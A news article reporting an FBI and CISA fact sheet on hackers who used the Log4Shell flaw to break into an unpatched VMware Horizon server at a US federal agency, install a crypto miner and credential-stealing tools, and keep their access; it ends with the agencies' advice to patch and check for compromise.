Change language

Iranian hackers hacked into US federal agency using old vulnerability

The FBI and CISA reported in a joint fact sheet that a hacker group hacked one of the Federal Civilian Executive Branch (FCEB) agencies that failed to install a patch for Log4Shell, a vulnerability that was patched nearly a year ago. Notably, back in April this year, the FBI warned about the importance of installing updates that closed such vulnerabilities.

Iranian hackers hacked into US federal agency using old vulnerability

CISA did not name the hacked agency FCEB, which includes organisations such as the Department of Homeland Security, the Treasury Department and the Federal Trade Commission. But some details of the incident have emerged.

CISA said it first noticed suspected malicious activity on the unnamed federal agency's network in April, when agency staff were performing a retrospective analysis using the government's Einstein intrusion detection system. But the problem was dealt with in detail over the summer, from May to July. The investigation revealed that hackers had exploited Log4Shell, a critical zero-day vulnerability in the ubiquitous open-source logging software Log4j.

Hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell remote code execution vulnerability allowed access to the organisation's network with administrator and system-level privileges. The hackers were then able to install the XMRig miner, an open-source crypto-mining software that hackers commonly use to mine virtual currency on compromised computers. This miner mined the cryptocurrency monero (XMR). The malware was uploaded to the agency's server as an archive file called file.zip.

In addition to the miner, the hackers installed Mimikatz, an open-source application used to steal credentials and create a new domain administrator account on the agency's servers. Using the new account, the hackers disabled Windows Defender and added Ngrok proxies to multiple hosts to preserve future access.

The US regulator notes that the attackers' ultimate motive remains unclear. But it says all organizations that have not already patched their VMware systems by closing the Log4Shell vulnerability should assume they have already been compromised, and should start looking for malicious activity on their networks.

Shop

Learn programming in R: courses

$

Best Python online courses for 2022

$

Best laptop for Fortnite

$

Best laptop for Excel

$

Best laptop for Solidworks

$

Best laptop for Roblox

$

Best computer for crypto mining

$

Best laptop for Sims 4

$

Latest questions

NUMPYNUMPY

Common xlabel/ylabel for matplotlib subplots

12 answers

NUMPYNUMPY

How to specify multiple return types using type-hints

12 answers

NUMPYNUMPY

Why do I get "Pickle - EOFError: Ran out of input" reading an empty file?

12 answers

NUMPYNUMPY

Flake8: Ignore specific warning for entire file

12 answers

NUMPYNUMPY

glob exclude pattern

12 answers

NUMPYNUMPY

How to avoid HTTP error 429 (Too Many Requests) python

12 answers

NUMPYNUMPY

Python CSV error: line contains NULL byte

12 answers

NUMPYNUMPY

csv.Error: iterator should return strings, not bytes

12 answers

News


Wiki

Python | How to copy data from one Excel sheet to another

Common xlabel/ylabel for matplotlib subplots

Check if one list is a subset of another in Python

sin

How to specify multiple return types using type-hints

exp

Printing words vertically in Python

exp

Python Extract words from a given string

Cyclic redundancy check in Python

Finding mean, median, mode in Python without libraries

cos

Python add suffix / add prefix to strings in a list

Why do I get "Pickle - EOFError: Ran out of input" reading an empty file?

Python - Move item to the end of the list

Python - Print list vertically